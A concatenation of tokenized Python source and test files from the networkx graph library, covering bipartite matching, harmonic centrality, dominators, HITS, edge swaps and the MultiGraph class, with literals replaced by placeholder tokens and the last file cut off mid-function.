</s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> import networkx as nx <EOL> from nose . tools import assert_true <EOL> from networkx . algorithms . bipartite . matching import eppstein_matching <EOL> from networkx . algorithms . bipartite . matching import hopcroft_karp_matching <EOL> from networkx . algorithms . bipartite . matching import maximum_matching <EOL> from networkx . algorithms . bipartite . matching import to_vertex_cover <EOL> class TestMatching ( ) : <EOL> """<STR_LIT>""" <EOL> def setup ( self ) : <EOL> """<STR_LIT>""" <EOL> edges = [ ( <NUM_LIT:0> , <NUM_LIT:7> ) , ( <NUM_LIT:0> , <NUM_LIT:8> ) , ( <NUM_LIT:2> , <NUM_LIT:6> ) , ( <NUM_LIT:2> , <NUM_LIT:9> ) , ( <NUM_LIT:3> , <NUM_LIT:8> ) , ( <NUM_LIT:4> , <NUM_LIT:8> ) , ( <NUM_LIT:4> , <NUM_LIT:9> ) , <EOL> ( <NUM_LIT:5> , <NUM_LIT:11> ) ] <EOL> self . graph = nx . Graph ( ) <EOL> self . graph . add_nodes_from ( range ( <NUM_LIT:12> ) ) <EOL> self . graph . add_edges_from ( edges ) <EOL> def check_match ( self , matching ) : <EOL> """<STR_LIT>""" <EOL> M = matching <EOL> matched_vertices = frozenset ( itertools . chain ( * M . items ( ) ) ) <EOL> assert matched_vertices == frozenset ( range ( <NUM_LIT:12> ) ) - { <NUM_LIT:1> , <NUM_LIT:10> } <EOL> assert all ( u == M [ M [ u ] ] for u in range ( <NUM_LIT:12> ) if u in M ) <EOL> def check_vertex_cover ( self , vertices ) : <EOL> """<STR_LIT>""" <EOL> assert len ( vertices ) == <NUM_LIT:5> <EOL> for ( u , v ) in self . graph . edges ( ) : <EOL> assert u in vertices or v in vertices <EOL> def test_eppstein_matching ( self ) : <EOL> """<STR_LIT>""" <EOL> self . check_match ( eppstein_matching ( self . graph ) ) <EOL> def test_hopcroft_karp_matching ( self ) : <EOL> """<STR_LIT>""" <EOL> self . check_match ( hopcroft_karp_matching ( self . graph ) ) <EOL> def test_to_vertex_cover ( self ) : <EOL> """<STR_LIT>""" <EOL> matching = maximum_matching ( self . graph ) <EOL> vertex_cover = to_vertex_cover ( self . graph , matching ) <EOL> self . 
check_vertex_cover ( vertex_cover ) <EOL> def test_eppstein_matching ( ) : <EOL> """<STR_LIT>""" <EOL> G = nx . Graph ( ) <EOL> G . add_nodes_from ( [ '<STR_LIT:a>' , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , bipartite = <NUM_LIT:0> ) <EOL> G . add_nodes_from ( [ <NUM_LIT:1> , '<STR_LIT:b>' , '<STR_LIT:c>' ] , bipartite = <NUM_LIT:1> ) <EOL> G . add_edges_from ( [ ( '<STR_LIT:a>' , <NUM_LIT:1> ) , ( '<STR_LIT:a>' , '<STR_LIT:b>' ) , ( <NUM_LIT:2> , '<STR_LIT:b>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT:c>' ) , ( <NUM_LIT:3> , '<STR_LIT:c>' ) , ( <NUM_LIT:4> , <NUM_LIT:1> ) ] ) <EOL> matching = eppstein_matching ( G ) <EOL> assert_true ( len ( matching ) == len ( maximum_matching ( G ) ) ) <EOL> assert all ( x in set ( matching . keys ( ) ) for x in set ( matching . values ( ) ) ) </s>
<s> """<STR_LIT>""" <EOL> from nose . tools import * <EOL> import networkx as nx <EOL> from networkx . algorithms . centrality import harmonic_centrality <EOL> class TestClosenessCentrality : <EOL> def setUp ( self ) : <EOL> self . P3 = nx . path_graph ( <NUM_LIT:3> ) <EOL> self . P4 = nx . path_graph ( <NUM_LIT:4> ) <EOL> self . K5 = nx . complete_graph ( <NUM_LIT:5> ) <EOL> self . C4 = nx . cycle_graph ( <NUM_LIT:4> ) <EOL> self . C5 = nx . cycle_graph ( <NUM_LIT:5> ) <EOL> self . T = nx . balanced_tree ( r = <NUM_LIT:2> , h = <NUM_LIT:2> ) <EOL> self . Gb = nx . DiGraph ( ) <EOL> self . Gb . add_edges_from ( [ ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:2> ) , ( <NUM_LIT:0> , <NUM_LIT:4> ) , ( <NUM_LIT:2> , <NUM_LIT:1> ) , <EOL> ( <NUM_LIT:2> , <NUM_LIT:3> ) , ( <NUM_LIT:4> , <NUM_LIT:3> ) ] ) <EOL> def test_p3_harmonic ( self ) : <EOL> c = harmonic_centrality ( self . P3 ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT> , <EOL> <NUM_LIT:1> : <NUM_LIT:2> , <EOL> <NUM_LIT:2> : <NUM_LIT> } <EOL> for n in sorted ( self . P3 ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_p4_harmonic ( self ) : <EOL> c = harmonic_centrality ( self . P4 ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT> , <EOL> <NUM_LIT:1> : <NUM_LIT> , <EOL> <NUM_LIT:2> : <NUM_LIT> , <EOL> <NUM_LIT:3> : <NUM_LIT> } <EOL> for n in sorted ( self . P4 ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_clique_complete ( self ) : <EOL> c = harmonic_centrality ( self . K5 ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT:4> , <EOL> <NUM_LIT:1> : <NUM_LIT:4> , <EOL> <NUM_LIT:2> : <NUM_LIT:4> , <EOL> <NUM_LIT:3> : <NUM_LIT:4> , <EOL> <NUM_LIT:4> : <NUM_LIT:4> } <EOL> for n in sorted ( self . P3 ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_cycle_C4 ( self ) : <EOL> c = harmonic_centrality ( self . 
C4 ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT> , <EOL> <NUM_LIT:1> : <NUM_LIT> , <EOL> <NUM_LIT:2> : <NUM_LIT> , <EOL> <NUM_LIT:3> : <NUM_LIT> , } <EOL> for n in sorted ( self . C4 ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_cycle_C5 ( self ) : <EOL> c = harmonic_centrality ( self . C5 ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT:3> , <EOL> <NUM_LIT:1> : <NUM_LIT:3> , <EOL> <NUM_LIT:2> : <NUM_LIT:3> , <EOL> <NUM_LIT:3> : <NUM_LIT:3> , <EOL> <NUM_LIT:4> : <NUM_LIT:3> , <EOL> <NUM_LIT:5> : <NUM_LIT:4> } <EOL> for n in sorted ( self . C5 ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_bal_tree ( self ) : <EOL> c = harmonic_centrality ( self . T ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT> , <EOL> <NUM_LIT:1> : <NUM_LIT> , <EOL> <NUM_LIT:2> : <NUM_LIT> , <EOL> <NUM_LIT:3> : <NUM_LIT> , <EOL> <NUM_LIT:4> : <NUM_LIT> , <EOL> <NUM_LIT:5> : <NUM_LIT> , <EOL> <NUM_LIT:6> : <NUM_LIT> } <EOL> for n in sorted ( self . T ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_exampleGraph ( self ) : <EOL> c = harmonic_centrality ( self . Gb ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT:0> , <EOL> <NUM_LIT:1> : <NUM_LIT:2> , <EOL> <NUM_LIT:2> : <NUM_LIT:1> , <EOL> <NUM_LIT:3> : <NUM_LIT> , <EOL> <NUM_LIT:4> : <NUM_LIT:1> } <EOL> for n in sorted ( self . Gb ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_weighted_harmonic ( self ) : <EOL> XG = nx . DiGraph ( ) <EOL> XG . 
add_weighted_edges_from ( [ ( '<STR_LIT:a>' , '<STR_LIT:b>' , <NUM_LIT:10> ) , ( '<STR_LIT:d>' , '<STR_LIT:c>' , <NUM_LIT:5> ) , ( '<STR_LIT:a>' , '<STR_LIT:c>' , <NUM_LIT:1> ) , <EOL> ( '<STR_LIT:e>' , '<STR_LIT:f>' , <NUM_LIT:2> ) , ( '<STR_LIT:f>' , '<STR_LIT:c>' , <NUM_LIT:1> ) , ( '<STR_LIT:a>' , '<STR_LIT:f>' , <NUM_LIT:3> ) , <EOL> ] ) <EOL> c = harmonic_centrality ( XG , distance = '<STR_LIT>' ) <EOL> d = { '<STR_LIT:a>' : <NUM_LIT:0> , <EOL> '<STR_LIT:b>' : <NUM_LIT:0.1> , <EOL> '<STR_LIT:c>' : <NUM_LIT> , <EOL> '<STR_LIT:d>' : <NUM_LIT:0> , <EOL> '<STR_LIT:e>' : <NUM_LIT:0> , <EOL> '<STR_LIT:f>' : <NUM_LIT> } <EOL> for n in sorted ( XG ) : <EOL> assert_almost_equal ( c [ n ] , d [ n ] , places = <NUM_LIT:3> ) <EOL> def test_empty ( self ) : <EOL> G = nx . DiGraph ( ) <EOL> c = harmonic_centrality ( G , distance = '<STR_LIT>' ) <EOL> d = { } <EOL> assert_equal ( c , d ) <EOL> def test_singleton ( self ) : <EOL> G = nx . DiGraph ( ) <EOL> G . add_node ( <NUM_LIT:0> ) <EOL> c = harmonic_centrality ( G , distance = '<STR_LIT>' ) <EOL> d = { <NUM_LIT:0> : <NUM_LIT:0> } <EOL> assert_equal ( c , d ) </s>
<s> """<STR_LIT>""" <EOL> import networkx as nx <EOL> from networkx . utils import not_implemented_for , pairwise <EOL> __all__ = [ '<STR_LIT>' ] <EOL> @ not_implemented_for ( '<STR_LIT>' ) <EOL> def is_semiconnected ( G ) : <EOL> """<STR_LIT>""" <EOL> if len ( G ) == <NUM_LIT:0> : <EOL> raise nx . NetworkXPointlessConcept ( <EOL> '<STR_LIT>' ) <EOL> if not nx . is_weakly_connected ( G ) : <EOL> return False <EOL> G = nx . condensation ( G ) <EOL> path = nx . topological_sort ( G ) <EOL> return all ( G . has_edge ( u , v ) for u , v in pairwise ( path ) ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> from functools import reduce <EOL> import networkx as nx <EOL> from networkx . utils import not_implemented_for <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> @ not_implemented_for ( '<STR_LIT>' ) <EOL> def immediate_dominators ( G , start ) : <EOL> """<STR_LIT>""" <EOL> if start not in G : <EOL> raise nx . NetworkXError ( '<STR_LIT>' ) <EOL> idom = { start : start } <EOL> order = list ( nx . dfs_postorder_nodes ( G , start ) ) <EOL> dfn = { u : i for i , u in enumerate ( order ) } <EOL> order . pop ( ) <EOL> order . reverse ( ) <EOL> def intersect ( u , v ) : <EOL> while u != v : <EOL> while dfn [ u ] < dfn [ v ] : <EOL> u = idom [ u ] <EOL> while dfn [ u ] > dfn [ v ] : <EOL> v = idom [ v ] <EOL> return u <EOL> changed = True <EOL> while changed : <EOL> changed = False <EOL> for u in order : <EOL> new_idom = reduce ( intersect , ( v for v in G . pred [ u ] if v in idom ) ) <EOL> if u not in idom or idom [ u ] != new_idom : <EOL> idom [ u ] = new_idom <EOL> changed = True <EOL> return idom <EOL> def dominance_frontiers ( G , start ) : <EOL> """<STR_LIT>""" <EOL> idom = nx . immediate_dominators ( G , start ) <EOL> df = { u : set ( ) for u in idom } <EOL> for u in idom : <EOL> if len ( G . pred [ u ] ) >= <NUM_LIT:2> : <EOL> for v in G . pred [ u ] : <EOL> if v in idom : <EOL> while v != idom [ u ] : <EOL> df [ v ] . add ( u ) <EOL> v = idom [ v ] <EOL> return df </s>
<s> """<STR_LIT>""" <EOL> import networkx as nx <EOL> from networkx . exception import NetworkXError <EOL> __author__ = """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def hits ( G , max_iter = <NUM_LIT:100> , tol = <NUM_LIT> , nstart = None , normalized = True ) : <EOL> """<STR_LIT>""" <EOL> if type ( G ) == nx . MultiGraph or type ( G ) == nx . MultiDiGraph : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if len ( G ) == <NUM_LIT:0> : <EOL> return { } , { } <EOL> if nstart is None : <EOL> h = dict . fromkeys ( G , <NUM_LIT:1.0> / G . number_of_nodes ( ) ) <EOL> else : <EOL> h = nstart <EOL> s = <NUM_LIT:1.0> / sum ( h . values ( ) ) <EOL> for k in h : <EOL> h [ k ] *= s <EOL> i = <NUM_LIT:0> <EOL> while True : <EOL> hlast = h <EOL> h = dict . fromkeys ( hlast . keys ( ) , <NUM_LIT:0> ) <EOL> a = dict . fromkeys ( hlast . keys ( ) , <NUM_LIT:0> ) <EOL> for n in h : <EOL> for nbr in G [ n ] : <EOL> a [ nbr ] += hlast [ n ] * G [ n ] [ nbr ] . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> for n in h : <EOL> for nbr in G [ n ] : <EOL> h [ n ] += a [ nbr ] * G [ n ] [ nbr ] . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> s = <NUM_LIT:1.0> / max ( h . values ( ) ) <EOL> for n in h : h [ n ] *= s <EOL> s = <NUM_LIT:1.0> / max ( a . values ( ) ) <EOL> for n in a : a [ n ] *= s <EOL> err = sum ( [ abs ( h [ n ] - hlast [ n ] ) for n in h ] ) <EOL> if err < tol : <EOL> break <EOL> if i > max_iter : <EOL> raise NetworkXError ( "<STR_LIT>" % ( i + <NUM_LIT:1> ) ) <EOL> i += <NUM_LIT:1> <EOL> if normalized : <EOL> s = <NUM_LIT:1.0> / sum ( a . values ( ) ) <EOL> for n in a : <EOL> a [ n ] *= s <EOL> s = <NUM_LIT:1.0> / sum ( h . values ( ) ) <EOL> for n in h : <EOL> h [ n ] *= s <EOL> return h , a <EOL> def authority_matrix ( G , nodelist = None ) : <EOL> """<STR_LIT>""" <EOL> M = nx . to_numpy_matrix ( G , nodelist = nodelist ) <EOL> return M . 
T * M <EOL> def hub_matrix ( G , nodelist = None ) : <EOL> """<STR_LIT>""" <EOL> M = nx . to_numpy_matrix ( G , nodelist = nodelist ) <EOL> return M * M . T <EOL> def hits_numpy ( G , normalized = True ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> import numpy as np <EOL> except ImportError : <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> if len ( G ) == <NUM_LIT:0> : <EOL> return { } , { } <EOL> H = nx . hub_matrix ( G , list ( G ) ) <EOL> e , ev = np . linalg . eig ( H ) <EOL> m = e . argsort ( ) [ - <NUM_LIT:1> ] <EOL> h = np . array ( ev [ : , m ] ) . flatten ( ) <EOL> A = nx . authority_matrix ( G , list ( G ) ) <EOL> e , ev = np . linalg . eig ( A ) <EOL> m = e . argsort ( ) [ - <NUM_LIT:1> ] <EOL> a = np . array ( ev [ : , m ] ) . flatten ( ) <EOL> if normalized : <EOL> h = h / h . sum ( ) <EOL> a = a / a . sum ( ) <EOL> else : <EOL> h = h / h . max ( ) <EOL> a = a / a . max ( ) <EOL> hubs = dict ( zip ( G , map ( float , h ) ) ) <EOL> authorities = dict ( zip ( G , map ( float , a ) ) ) <EOL> return hubs , authorities <EOL> def hits_scipy ( G , max_iter = <NUM_LIT:100> , tol = <NUM_LIT> , normalized = True ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> import scipy . sparse <EOL> import numpy as np <EOL> except ImportError : <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> if len ( G ) == <NUM_LIT:0> : <EOL> return { } , { } <EOL> M = nx . to_scipy_sparse_matrix ( G , nodelist = list ( G ) ) <EOL> ( n , m ) = M . shape <EOL> A = M . T * M <EOL> x = scipy . ones ( ( n , <NUM_LIT:1> ) ) / n <EOL> i = <NUM_LIT:0> <EOL> while True : <EOL> xlast = x <EOL> x = A * x <EOL> x = x / x . max ( ) <EOL> err = scipy . absolute ( x - xlast ) . sum ( ) <EOL> if err < tol : <EOL> break <EOL> if i > max_iter : <EOL> raise NetworkXError ( "<STR_LIT>" % ( i + <NUM_LIT:1> ) ) <EOL> i += <NUM_LIT:1> <EOL> a = np . asarray ( x ) . flatten ( ) <EOL> h = np . asarray ( M * a ) . flatten ( ) <EOL> if normalized : <EOL> h = h / h . sum ( ) <EOL> a = a / a . 
sum ( ) <EOL> hubs = dict ( zip ( G , map ( float , h ) ) ) <EOL> authorities = dict ( zip ( G , map ( float , a ) ) ) <EOL> return hubs , authorities <EOL> def setup_module ( module ) : <EOL> from nose import SkipTest <EOL> try : <EOL> import numpy <EOL> except : <EOL> raise SkipTest ( "<STR_LIT>" ) <EOL> try : <EOL> import scipy <EOL> except : <EOL> raise SkipTest ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> import math <EOL> import random <EOL> import networkx as nx <EOL> __author__ = "<STR_LIT:\n>" . join ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> __all__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def double_edge_swap ( G , nswap = <NUM_LIT:1> , max_tries = <NUM_LIT:100> ) : <EOL> """<STR_LIT>""" <EOL> if G . is_directed ( ) : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> if nswap > max_tries : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> if len ( G ) < <NUM_LIT:4> : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> n = <NUM_LIT:0> <EOL> swapcount = <NUM_LIT:0> <EOL> keys , degrees = zip ( * G . degree ( ) ) <EOL> cdf = nx . utils . cumulative_distribution ( degrees ) <EOL> while swapcount < nswap : <EOL> ( ui , xi ) = nx . utils . discrete_sequence ( <NUM_LIT:2> , cdistribution = cdf ) <EOL> if ui == xi : <EOL> continue <EOL> u = keys [ ui ] <EOL> x = keys [ xi ] <EOL> v = random . choice ( list ( G [ u ] ) ) <EOL> y = random . choice ( list ( G [ x ] ) ) <EOL> if v == y : <EOL> continue <EOL> if ( x not in G [ u ] ) and ( y not in G [ v ] ) : <EOL> G . add_edge ( u , x ) <EOL> G . add_edge ( v , y ) <EOL> G . remove_edge ( u , v ) <EOL> G . remove_edge ( x , y ) <EOL> swapcount += <NUM_LIT:1> <EOL> if n >= max_tries : <EOL> e = ( '<STR_LIT>' % n + <EOL> '<STR_LIT>' % nswap ) <EOL> raise nx . NetworkXAlgorithmError ( e ) <EOL> n += <NUM_LIT:1> <EOL> return G <EOL> def connected_double_edge_swap ( G , nswap = <NUM_LIT:1> , _window_threshold = <NUM_LIT:3> ) : <EOL> """<STR_LIT>""" <EOL> if not nx . is_connected ( G ) : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> if len ( G ) < <NUM_LIT:4> : <EOL> raise nx . NetworkXError ( "<STR_LIT>" ) <EOL> n = <NUM_LIT:0> <EOL> swapcount = <NUM_LIT:0> <EOL> deg = G . degree ( ) <EOL> dk = list ( n for n , d in G . degree ( ) ) <EOL> cdf = nx . utils . 
cumulative_distribution ( list ( d for n , d in G . degree ( ) ) ) <EOL> window = <NUM_LIT:1> <EOL> while n < nswap : <EOL> wcount = <NUM_LIT:0> <EOL> swapped = [ ] <EOL> if window < _window_threshold : <EOL> fail = False <EOL> while wcount < window and n < nswap : <EOL> ( ui , xi ) = nx . utils . discrete_sequence ( <NUM_LIT:2> , cdistribution = cdf ) <EOL> if ui == xi : <EOL> continue <EOL> u = dk [ ui ] <EOL> x = dk [ xi ] <EOL> v = random . choice ( list ( G . neighbors ( u ) ) ) <EOL> y = random . choice ( list ( G . neighbors ( x ) ) ) <EOL> if v == y : <EOL> continue <EOL> if x not in G [ u ] and y not in G [ v ] : <EOL> G . remove_edge ( u , v ) <EOL> G . remove_edge ( x , y ) <EOL> G . add_edge ( u , x ) <EOL> G . add_edge ( v , y ) <EOL> swapped . append ( ( u , v , x , y ) ) <EOL> swapcount += <NUM_LIT:1> <EOL> n += <NUM_LIT:1> <EOL> if nx . has_path ( G , u , v ) : <EOL> wcount += <NUM_LIT:1> <EOL> else : <EOL> G . add_edge ( u , v ) <EOL> G . add_edge ( x , y ) <EOL> G . remove_edge ( u , x ) <EOL> G . remove_edge ( v , y ) <EOL> swapcount -= <NUM_LIT:1> <EOL> fail = True <EOL> if fail : <EOL> window = int ( math . ceil ( window / <NUM_LIT:2> ) ) <EOL> else : <EOL> window += <NUM_LIT:1> <EOL> else : <EOL> while wcount < window and n < nswap : <EOL> ( ui , xi ) = nx . utils . discrete_sequence ( <NUM_LIT:2> , cdistribution = cdf ) <EOL> if ui == xi : <EOL> continue <EOL> u = dk [ ui ] <EOL> x = dk [ xi ] <EOL> v = random . choice ( list ( G . neighbors ( u ) ) ) <EOL> y = random . choice ( list ( G . neighbors ( x ) ) ) <EOL> if v == y : <EOL> continue <EOL> if x not in G [ u ] and y not in G [ v ] : <EOL> G . remove_edge ( u , v ) <EOL> G . remove_edge ( x , y ) <EOL> G . add_edge ( u , x ) <EOL> G . add_edge ( v , y ) <EOL> swapped . append ( ( u , v , x , y ) ) <EOL> swapcount += <NUM_LIT:1> <EOL> n += <NUM_LIT:1> <EOL> wcount += <NUM_LIT:1> <EOL> if nx . 
is_connected ( G ) : <EOL> window += <NUM_LIT:1> <EOL> else : <EOL> while swapped : <EOL> ( u , v , x , y ) = swapped . pop ( ) <EOL> G . add_edge ( u , v ) <EOL> G . add_edge ( x , y ) <EOL> G . remove_edge ( u , x ) <EOL> G . remove_edge ( v , y ) <EOL> swapcount -= <NUM_LIT:1> <EOL> window = int ( math . ceil ( window / <NUM_LIT:2> ) ) <EOL> return swapcount </s>
<s> """<STR_LIT>""" <EOL> from nose . tools import assert_equal <EOL> import networkx as nx <EOL> def test_triadic_census ( ) : <EOL> """<STR_LIT>""" <EOL> G = nx . DiGraph ( ) <EOL> G . add_edges_from ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> expected = { '<STR_LIT>' : <NUM_LIT:2> , '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:9> , '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:9> , '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:2> } <EOL> actual = nx . triadic_census ( G ) <EOL> assert_equal ( expected , actual ) </s>
<s> """<STR_LIT>""" <EOL> from copy import deepcopy <EOL> import networkx as nx <EOL> from networkx . classes . graph import Graph <EOL> from networkx import NetworkXError <EOL> __author__ = """<STR_LIT:\n>""" . join ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> class MultiGraph ( Graph ) : <EOL> """<STR_LIT>""" <EOL> edge_key_dict_factory = dict <EOL> def __init__ ( self , data = None , ** attr ) : <EOL> self . edge_key_dict_factory = self . edge_key_dict_factory <EOL> Graph . __init__ ( self , data , ** attr ) <EOL> def add_edge ( self , u , v , key = None , attr_dict = None , ** attr ) : <EOL> """<STR_LIT>""" <EOL> if attr_dict is None : <EOL> attr_dict = attr <EOL> else : <EOL> try : <EOL> attr_dict . update ( attr ) <EOL> except AttributeError : <EOL> raise NetworkXError ( <EOL> "<STR_LIT>" ) <EOL> if u not in self . adj : <EOL> self . adj [ u ] = self . adjlist_dict_factory ( ) <EOL> self . node [ u ] = { } <EOL> if v not in self . adj : <EOL> self . adj [ v ] = self . adjlist_dict_factory ( ) <EOL> self . node [ v ] = { } <EOL> if v in self . adj [ u ] : <EOL> keydict = self . adj [ u ] [ v ] <EOL> if key is None : <EOL> key = len ( keydict ) <EOL> while key in keydict : <EOL> key += <NUM_LIT:1> <EOL> datadict = keydict . get ( key , self . edge_attr_dict_factory ( ) ) <EOL> datadict . update ( attr_dict ) <EOL> keydict [ key ] = datadict <EOL> else : <EOL> if key is None : <EOL> key = <NUM_LIT:0> <EOL> datadict = self . edge_attr_dict_factory ( ) <EOL> datadict . update ( attr_dict ) <EOL> keydict = self . edge_key_dict_factory ( ) <EOL> keydict [ key ] = datadict <EOL> self . adj [ u ] [ v ] = keydict <EOL> self . adj [ v ] [ u ] = keydict <EOL> def add_edges_from ( self , ebunch , attr_dict = None , ** attr ) : <EOL> """<STR_LIT>""" <EOL> if attr_dict is None : <EOL> attr_dict = attr <EOL> else : <EOL> try : <EOL> attr_dict . 
update ( attr ) <EOL> except AttributeError : <EOL> raise NetworkXError ( <EOL> "<STR_LIT>" ) <EOL> for e in ebunch : <EOL> ne = len ( e ) <EOL> if ne == <NUM_LIT:4> : <EOL> u , v , key , dd = e <EOL> elif ne == <NUM_LIT:3> : <EOL> u , v , dd = e <EOL> key = None <EOL> elif ne == <NUM_LIT:2> : <EOL> u , v = e <EOL> dd = { } <EOL> key = None <EOL> else : <EOL> raise NetworkXError ( <EOL> "<STR_LIT>" % ( e , ) ) <EOL> ddd = { } <EOL> ddd . update ( attr_dict ) <EOL> ddd . update ( dd ) <EOL> self . add_edge ( u , v , key , ddd ) <EOL> def remove_edge ( self , u , v , key = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> d = self . adj [ u ] [ v ] <EOL> except ( KeyError ) : <EOL> raise NetworkXError ( <EOL> "<STR_LIT>" % ( u , v ) ) <EOL> if key is None : <EOL> d . popitem ( ) <EOL> else : <EOL> try : <EOL> del d [ key ] <EOL> except ( KeyError ) : <EOL> raise NetworkXError ( <EOL> "<STR_LIT>" % ( <EOL> u , v , key ) ) <EOL> if len ( d ) == <NUM_LIT:0> : <EOL> del self . adj [ u ] [ v ] <EOL> if u != v : <EOL> del self . adj [ v ] [ u ] <EOL> def remove_edges_from ( self , ebunch ) : <EOL> """<STR_LIT>""" <EOL> for e in ebunch : <EOL> try : <EOL> self . remove_edge ( * e [ : <NUM_LIT:3> ] ) <EOL> except NetworkXError : <EOL> pass <EOL> def has_edge ( self , u , v , key = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if key is None : <EOL> return v in self . adj [ u ] <EOL> else : <EOL> return key in self . adj [ u ] [ v ] <EOL> except KeyError : <EOL> return False <EOL> def edges ( self , nbunch = None , data = False , keys = False , default = None ) : <EOL> """<STR_LIT>""" <EOL> seen = { } <EOL> if nbunch is None : <EOL> nodes_nbrs = self . adj . items ( ) <EOL> else : <EOL> nodes_nbrs = ( ( n , self . adj [ n ] ) for n in self . nbunch_iter ( nbunch ) ) <EOL> if data is True : <EOL> for n , nbrs in nodes_nbrs : <EOL> for nbr , keydict in nbrs . items ( ) : <EOL> if nbr not in seen : <EOL> for key , ddict in keydict . 
items ( ) : <EOL> yield ( n , nbr , key , ddict ) if keys else ( n , nbr , ddict ) <EOL> seen [ n ] = <NUM_LIT:1> <EOL> elif data is not False : <EOL> for n , nbrs in nodes_nbrs : <EOL> for nbr , keydict in nbrs . items ( ) : <EOL> if nbr not in seen : <EOL> for key , ddict in keydict . items ( ) : <EOL> d = ddict [ data ] if data in ddict else default <EOL> yield ( n , nbr , key , d ) if keys else ( n , nbr , d ) <EOL> seen [ n ] = <NUM_LIT:1> <EOL> else : <EOL> for n , nbrs in nodes_nbrs : <EOL> for nbr , keydict in nbrs . items ( ) : <EOL> if nbr not in seen : <EOL> for key in keydict : <EOL> yield ( n , nbr , key ) if keys else ( n , nbr ) <EOL> seen [ n ] = <NUM_LIT:1> <EOL> del seen <EOL> def get_edge_data ( self , u , v , key = None , default = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if key is None : <EOL> return self . adj [ u ] [ v ] <EOL> else : <EOL> return self . adj [ u ] [ v ] [ key ] <EOL> except KeyError : <EOL> return default <EOL> def degree ( self , nbunch = None , weight = None ) : <EOL> """<STR_LIT>""" <EOL> if nbunch in self : <EOL> nbrs = self . adj [ nbunch ] <EOL> if weight is None : <EOL> return sum ( [ len ( data ) for data in nbrs . values ( ) ] ) + ( nbunch in nbrs and len ( nbrs [ nbunch ] ) ) <EOL> deg = sum ( [ d . get ( weight , <NUM_LIT:1> ) for data in nbrs . values ( ) for d in data . values ( ) ] ) <EOL> if nbunch in nbrs : <EOL> deg += sum ( [ d . get ( weight , <NUM_LIT:1> ) for key , d in nbrs [ nbunch ] . items ( ) ] ) <EOL> return deg <EOL> if nbunch is None : <EOL> nodes_nbrs = self . adj . items ( ) <EOL> else : <EOL> nodes_nbrs = ( ( n , self . adj [ n ] ) for n in self . nbunch_iter ( nbunch ) ) <EOL> if weight is None : <EOL> def d_iter ( ) : <EOL> for n , nbrs in nodes_nbrs : <EOL> deg = sum ( [ len ( data ) for data in nbrs . values ( ) ] ) <EOL> yield ( n , deg + ( n in nbrs and len ( nbrs [ n ] ) ) ) <EOL> else : <EOL> def d_iter ( ) : <EOL> for n , nbrs in nodes_nbrs : <EOL> deg = sum ( [ d . 
